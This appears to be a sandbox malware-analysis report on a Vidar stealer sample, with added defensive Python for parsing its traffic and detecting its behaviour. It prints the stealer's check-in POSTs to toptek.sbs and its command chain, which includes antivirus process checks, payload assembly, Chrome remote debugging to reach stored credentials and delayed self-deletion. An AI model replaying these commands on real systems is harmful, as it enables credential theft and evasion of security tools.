  Data Raw (the report prints only the beginning of the record): 2d 2d 2d 2d 2d 2d 56 4b 46 4b 4e 4f 48 34 37 47 56 33 37 59 35 46 33 4f 50 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 56 4b 46 4b 4e 4f 48 34 37 47 56 33 37 59 35 46 33 4f 50 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 56 4b 46 4b 4e 4f 48 34 37 47 56 33 37 59 35 46 33 4f 50 48 0d 0a 43 6f 6e 74
  Data Ascii (CRLF from the hex shown as \r\n): ------VKFKNOH47GV37Y5F3OPH\r\nContent-Disposition: form-data; name="token"\r\n\r\na66c99b4ea1107d67781e132b296cd32\r\n------VKFKNOH47GV37Y5F3OPH\r\nContent-Disposition: form-data; name="build_id"\r\n\r\ndadb5e51ebe3ba12afb7fbe624d12a2b\r\n------VKFKNOH47GV37Y5F3OPH\r\nCont
2024-12-23 05:22:15 UTC  158 bytes  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 23 Dec 2024 05:22:14 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
2024-12-23 05:22:15 UTC  5 bytes  IN
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii (CRLF from the hex shown as \r\n): 0\r\n\r\n
  Decoded chunked body: empty (terminating chunk only)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49819 | 94.130.188.57 | 443 | 7548 | C:\Users\user\AppData\Local\Temp\245347\Dry.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:22:16 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----NYCBIEUAAI5F37GVKNOZ
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-23 05:22:16 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4e 59 43 42 49 45 55 41 41 49 35 46 33 37 47 56 4b 4e 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 4e 59 43 42 49 45 55 41 41 49 35 46 33 37 47 56 4b 4e 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 4e 59 43 42 49 45 55 41 41 49 35 46 33 37 47 56 4b 4e 4f 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------NYCBIEUAAI5F37GVKNOZContent-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------NYCBIEUAAI5F37GVKNOZContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------NYCBIEUAAI5F37GVKNOZCont
2024-12-23 05:22:17 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:22:17 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
2024-12-23 05:22:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 0
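
The POST above is a multipart/form-data request carrying two fields, token and build_id, each a 32-character lowercase hex string. The sandbox shows the body only as a hex dump cut off inside the header of a third field ("Cont"), so a parser has to tolerate a truncated final part. The following Python is an added example, not part of the Joe Sandbox report: it decodes the "Data Raw" hex exactly as printed above, splits the body on the boundary taken from the request's Content-Type header, and reproduces the report's "Data Ascii" rendering as a cross-check. Function names are my own; the boundary, hex and field names are copied from the capture.

```python
import re

# Boundary from the request's Content-Type header above.
BOUNDARY = "----NYCBIEUAAI5F37GVKNOZ"

# The "Data Raw" hex as printed in the report, one line per logical piece.
# The report shows only part of the 331-byte body; the dump ends with "Cont".
DATA_RAW_HEX = " ".join([
    "2d 2d 2d 2d 2d 2d 4e 59 43 42 49 45 55 41 41 49 35 46 33 37 47 56 4b 4e 4f 5a 0d 0a",
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a",
    "61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a",
    "2d 2d 2d 2d 2d 2d 4e 59 43 42 49 45 55 41 41 49 35 46 33 37 47 56 4b 4e 4f 5a 0d 0a",
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a",
    "64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a",
    "2d 2d 2d 2d 2d 2d 4e 59 43 42 49 45 55 41 41 49 35 46 33 37 47 56 4b 4e 4f 5a 0d 0a",
    "43 6f 6e 74",
])


def decode_hex_dump(hex_dump: str) -> bytes:
    """Turn the report's space-separated hex into raw bytes."""
    return bytes.fromhex(hex_dump)


def ascii_view(body: bytes) -> str:
    """Approximate the report's 'Data Ascii' column: CR/LF dropped,
    other control bytes shown as '.', printable ASCII kept."""
    out = []
    for b in body:
        if b in (0x0D, 0x0A):
            continue
        out.append(chr(b) if 0x20 <= b < 0x7F else ".")
    return "".join(out)


def parse_multipart(body: bytes, boundary: str) -> tuple[dict[str, bytes], bool]:
    """Split a multipart/form-data body into {field name: raw value}.

    Returns (fields, truncated). truncated is True when the body ends inside a
    part whose headers never finish, which is the case for the captured dump.
    """
    delimiter = b"--" + boundary.encode("ascii")
    fields: dict[str, bytes] = {}
    truncated = False
    # split()[0] is the preamble before the first delimiter (empty here).
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):            # closing delimiter "--boundary--"
            break
        if part.startswith(b"\r\n"):          # CRLF that terminates the delimiter line
            part = part[2:]
        headers, sep, value = part.partition(b"\r\n\r\n")
        if not sep:                           # header block cut off: dump ended mid-part
            truncated = True
            continue
        name = re.search(rb'name="([^"]*)"', headers)
        if name is None:
            continue
        # The CRLF before the next delimiter belongs to the delimiter, not the value.
        if value.endswith(b"\r\n"):
            value = value[:-2]
        fields[name.group(1).decode("ascii")] = value
    return fields, truncated


def checkin_fields(hex_dump: str = DATA_RAW_HEX, boundary: str = BOUNDARY) -> tuple[dict[str, str], bool]:
    """Decode the dump and return the form fields as text plus the truncation flag."""
    fields, truncated = parse_multipart(decode_hex_dump(hex_dump), boundary)
    return {k: v.decode("ascii", "replace") for k, v in fields.items()}, truncated


if __name__ == "__main__":
    fields, truncated = checkin_fields()
    for name, value in fields.items():
        print(f"{name} = {value}")
    print("body truncated in capture:", truncated)
```

The truncation flag matters in practice: a parser that assumes a well-formed closing delimiter would either raise or silently drop the last complete field when fed a sandbox excerpt like this one, and the Content-Length header (331) versus the bytes actually shown is the hint that more parts followed.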


                                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                                  Start time:00:20:55
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\9EI7wrGs4K.exe"
                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                  File size:863'093 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:8EB4F92605E35C57A42B0917C221D65C
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                                                  Start time:00:20:56
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd
                                                                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                                                  Start time:00:20:56
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                                                  Start time:00:20:58
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:tasklist
                                                                                                                                                                                                                                                                                  Imagebase:0xdb0000
                                                                                                                                                                                                                                                                                  File size:79'360 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                                                  Start time:00:20:58
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                                  Imagebase:0x30000
                                                                                                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:5
Start time: 00:20:59
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist
Imagebase: 0xdb0000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 00:20:59
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase: 0x30000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 00:20:59
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c md 245347
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 00:20:59
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr /V "profiles" Organizing
Imagebase: 0x30000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 00:21:00
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c copy /b ..\Judy + ..\Sheets + ..\Another + ..\Wanting b
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 00:21:00
Start date: 23/12/2024
Path: C:\Users\user\AppData\Local\Temp\245347\Dry.com
Wow64 process (32bit): true
Commandline: Dry.com b
Imagebase: 0xae0000
File size: 947'288 bytes
MD5 hash: 62D09F076E6E0240548C2F837536A46A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1842774905.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1842371095.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1842833283.000000000165D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2458694756.000000000157D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2458694756.000000000157D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2459089556.0000000001638000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2461862261.0000000003F91000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1842430157.00000000015C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1842551934.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1842719771.00000000015A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation: moderate
Has exited: true

Target ID: 11
Start time: 00:21:00
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit): true
Commandline: choice /d y /t 5
Imagebase: 0x6d0000
File size: 28'160 bytes
MD5 hash: FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 15
Start time: 00:21:32
Start date: 23/12/2024
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                                                                                                  Start time:00:21:33
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2664 --field-trial-handle=2436,i,2326185924159091694,5961255311856640227,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                                                                  Start time:00:22:16
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\245347\Dry.com" & rd /s /q "C:\ProgramData\OHVS0RIMGLNY" & exit
                                                                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                                                                  Start time:00:22:16
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                                                                  Start time:00:22:17
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:timeout /t 10
                                                                                                                                                                                                                                                                                  Imagebase:0x490000
                                                                                                                                                                                                                                                                                  File size:25'088 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

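As an added example (not part of the Joe Sandbox report), the two process-creation patterns in the entries above expressed as detection logic. Target 15 starts chrome.exe with --remote-debugging-port=9223 against the user's real Default profile, which is the route the report flags as an attempt to bypass Chrome App-Bound Encryption; Target 18 is a cmd.exe chain that waits ten seconds, deletes the dropped Dry.com and removes the ProgramData working directory, the usual clean-up after the stealer has exited. The sample events are constructed from the Commandline fields above; the event field names, the extra delay and delete verbs beyond the ones this report shows, and the rule names are this example's own assumptions.

```python
# Added example (not from the Joe Sandbox report): detection logic for the two
# process-creation patterns shown in the process entries above.
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    target_id: int   # the report's Target ID
    image: str       # the report's Path field
    cmdline: str     # the report's Commandline field


# Constructed from the Commandline fields above (Targets 15, 17, 18, 20).
SAMPLE_EVENTS = [
    ProcEvent(15, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
              r'--remote-debugging-port=9223 --profile-directory="Default"'),
    ProcEvent(17, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility '
              r'--utility-sub-type=network.mojom.NetworkService --lang=en-US '
              r'--service-sandbox-type=none --mojo-platform-channel-handle=2664 /prefetch:8'),
    ProcEvent(18, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q '
              r'"C:\Users\user\AppData\Local\Temp\245347\Dry.com" & rd /s /q '
              r'"C:\ProgramData\OHVS0RIMGLNY" & exit'),
    ProcEvent(20, r"C:\Windows\SysWOW64\timeout.exe", "timeout /t 10"),
]

REMOTE_DEBUG_RE = re.compile(r"--remote-debugging-port=(\d+)", re.IGNORECASE)
CMD_PAYLOAD_RE = re.compile(r"\s/[ck]\s+(.*)$", re.IGNORECASE | re.DOTALL)
# timeout and choice appear in this report; ping is the other common cmd.exe sleep
# substitute (assumption: not shown on this page).
DELAY_VERBS = {"timeout", "choice", "ping"}
DELETE_VERBS = {"del", "erase", "rd", "rmdir"}


def image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_chrome_remote_debugging(ev: ProcEvent):
    """Chrome browser process started with a remote-debugging port. The switch
    is only on the browser process, so Chrome's own --type=utility children
    (Target 17) do not match."""
    if image_name(ev.image) != "chrome.exe":
        return None
    m = REMOTE_DEBUG_RE.search(ev.cmdline)
    if not m:
        return None
    profile = re.search(r'--profile-directory="?([^"\s]+)"?', ev.cmdline)
    return {"rule": "chrome_remote_debugging", "target_id": ev.target_id,
            "port": int(m.group(1)),
            "profile": profile.group(1) if profile else None}


def split_cmd_chain(payload: str):
    """Split 'a & b && c' into its commands, ignoring '&' inside double quotes."""
    cmds, buf, quoted = [], [], False
    for ch in payload:
        if ch == '"':
            quoted = not quoted
        if ch == "&" and not quoted:
            cmds.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    cmds.append("".join(buf).strip())
    return [c for c in cmds if c]


def detect_cmd_self_delete(ev: ProcEvent):
    """cmd.exe /c chain that sleeps and then deletes files or directories: the
    delay lets the parent exit so its own dropped image can be removed."""
    if image_name(ev.image) != "cmd.exe":
        return None
    m = CMD_PAYLOAD_RE.search(ev.cmdline)
    if not m:
        return None
    cmds = split_cmd_chain(m.group(1))
    verbs = [c.split()[0].lower() for c in cmds]
    delays = [i for i, v in enumerate(verbs) if v in DELAY_VERBS]
    if not delays:
        return None
    deletes = [c for i, (c, v) in enumerate(zip(cmds, verbs))
               if v in DELETE_VERBS and i > delays[0]]
    if not deletes:
        return None
    targets = re.findall(r'"([^"]+)"', " ".join(deletes))  # quoted paths only
    return {"rule": "cmd_delayed_self_delete", "target_id": ev.target_id,
            "targets": targets}


RULES = (detect_chrome_remote_debugging, detect_cmd_self_delete)


def run_rules(events):
    hits = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in run_rules(SAMPLE_EVENTS):
        print(hit)
```

Run against the four constructed events the rules fire on Targets 15 and 18 only. The Chrome rule is a hunt signal rather than a verdict: browser automation frameworks also start Chrome with a remote-debugging port, so in production it needs the parent process as context (here the report's per-process entries do not carry the parent, which is why the rule does not key on it), and a non-developer parent combined with the user's real --profile-directory is the combination worth alerting on.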

Execution Graph

Execution Coverage:17.8%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:21%
Total number of Nodes:1482
Total number of Limit Nodes:26
[Execution graph: rendered interactively on the original page; the node/edge listing is not reproducible as text and ends mid-graph on the page. Nodes are code addresses in the sample's 0x401000-0x407000 range. API calls that appear on graph nodes: CreateFileW, ReadFile, WriteFile, SetFilePointer, GetFileAttributesW, DeleteFileW, FindClose, GlobalAlloc, GlobalFree, OpenProcess, CreateThread, LoadLibraryA, LoadLibraryExW, GetModuleHandleW, GetProcAddress, FreeLibrary, GetVersionExW, RegOpenKeyExW, RegEnumKeyW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, SHFileOperationW, SHBrowseForFolderW, CoTaskMemFree, MessageBoxIndirectW, GetAsyncKeyState, dialog and window helpers (GetDlgItem, GetDlgItemTextW, SetDlgItemTextW, CheckDlgButton, IsDlgButtonChecked, SendMessageW, CallWindowProcW, ShowWindow, EnableWindow, IsWindow, IsWindowVisible, SetWindowTextW, SetTimer, GetSysColor, GetMessagePos, ScreenToClient, GetDiskFreeSpaceW, MulDiv) and string helpers (lstrcpyW, lstrcpynW, lstrcpynA, lstrcmpW, lstrcmpiW, lstrcmpA, lstrcatW, lstrlenW, wsprintfW, WideCharToMultiByte, CharUpperW). One loop worth noting at 0x406528-0x4065b1 pairs OpenProcess with CharUpperW and lstrcmpW before closing the handle and iterating, i.e. a case-insensitive comparison of process names.]
